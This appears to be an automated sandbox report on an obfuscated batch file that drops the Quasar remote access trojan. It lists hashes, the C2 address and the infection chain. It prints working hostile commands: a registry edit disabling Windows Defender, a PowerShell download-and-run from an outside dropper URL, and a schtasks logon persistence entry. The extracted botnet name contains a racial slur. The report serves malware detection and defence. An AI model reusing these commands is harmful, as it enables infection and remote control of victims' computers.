Analysis

  • max time kernel
    14s
  • max time network
    16s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-12-2024 17:24

General

  • Target

    FUD RAT___Obfuscated.bat

  • Size

    463B

  • MD5

    a9fdda2577ff67660be21d0d4cd98179

  • SHA1

    15432871fed4cbb19ec26eaabcc6b193beebbbfb

  • SHA256

    8f18705cf5653667888ea5f2440e984d22c5207e7e5e2fccb68e7ad71f58bb83

  • SHA512

    0f43e8b47bdd9d1a2ce65db49868f7698b83bcb5f8d249a29078793e5ca48d75bf8ce99dae00f772c28b766ac761040c0113d9034e7e7d35efb75b39eca5153d

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://whatsabool.online/kingvonpiracyvirus/load.exe

Extracted

Family

quasar

Version

1.4.1

Botnet

Dumb Niggas

C2

85.209.133.15:111

Mutex

95ddd19c-037b-4e62-8c64-298b31d663b8

Attributes
  • encryption_key

    04FB780AC53244A8569349610FCC9CFEE3EEB90D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    system

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FUD RAT___Obfuscated.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1132
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
        PID:3252
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://whatsabool.online/kingvonpiracyvirus/load.exe', 'C:\Users\Admin\AppData\Local\Temp\load.exe')"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4436
      • C:\Users\Admin\AppData\Local\Temp\load.exe
        "C:\Users\Admin\AppData\Local\Temp\load.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2040
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2404
        • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
          "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:640
          • C:\Windows\SYSTEM32\schtasks.exe
            "schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4072

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a5xgreix.b3s.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\load.exe

      Filesize

      3.1MB

      MD5

      68b6e948c723b1127c027d2dc9505a13

      SHA1

      e8056196a1ada4f7c266d4d5417d02492b4fbe6e

      SHA256

      cb311e549d10e963d612cefd4fa5ca5d49f0f3b16db3525823e811ec58ec6ebb

      SHA512

      079eb9475d5984a95590387d2ed32fda030785ae1911a1e8a7e7732e3d62e313a88769b96122814a077fb1824424e6f82bcc415e89e7f1d1e981b052a4172761

    • memory/640-35-0x000000001C6E0000-0x000000001C71C000-memory.dmp

      Filesize

      240KB

    • memory/640-34-0x000000001BF80000-0x000000001BF92000-memory.dmp

      Filesize

      72KB

    • memory/640-31-0x000000001BFE0000-0x000000001C092000-memory.dmp

      Filesize

      712KB

    • memory/640-30-0x000000001B6D0000-0x000000001B720000-memory.dmp

      Filesize

      320KB

    • memory/2040-22-0x00007FF8563B0000-0x00007FF856E71000-memory.dmp

      Filesize

      10.8MB

    • memory/2040-20-0x0000000000A70000-0x0000000000D92000-memory.dmp

      Filesize

      3.1MB

    • memory/2040-21-0x00007FF8563B0000-0x00007FF856E71000-memory.dmp

      Filesize

      10.8MB

    • memory/2040-29-0x00007FF8563B0000-0x00007FF856E71000-memory.dmp

      Filesize

      10.8MB

    • memory/4436-0-0x00007FF8563B3000-0x00007FF8563B5000-memory.dmp

      Filesize

      8KB

    • memory/4436-16-0x00007FF8563B0000-0x00007FF856E71000-memory.dmp

      Filesize

      10.8MB

    • memory/4436-12-0x00007FF8563B0000-0x00007FF856E71000-memory.dmp

      Filesize

      10.8MB

    • memory/4436-11-0x00007FF8563B0000-0x00007FF856E71000-memory.dmp

      Filesize

      10.8MB

    • memory/4436-1-0x000001E1F83D0000-0x000001E1F83F2000-memory.dmp

      Filesize

      136KB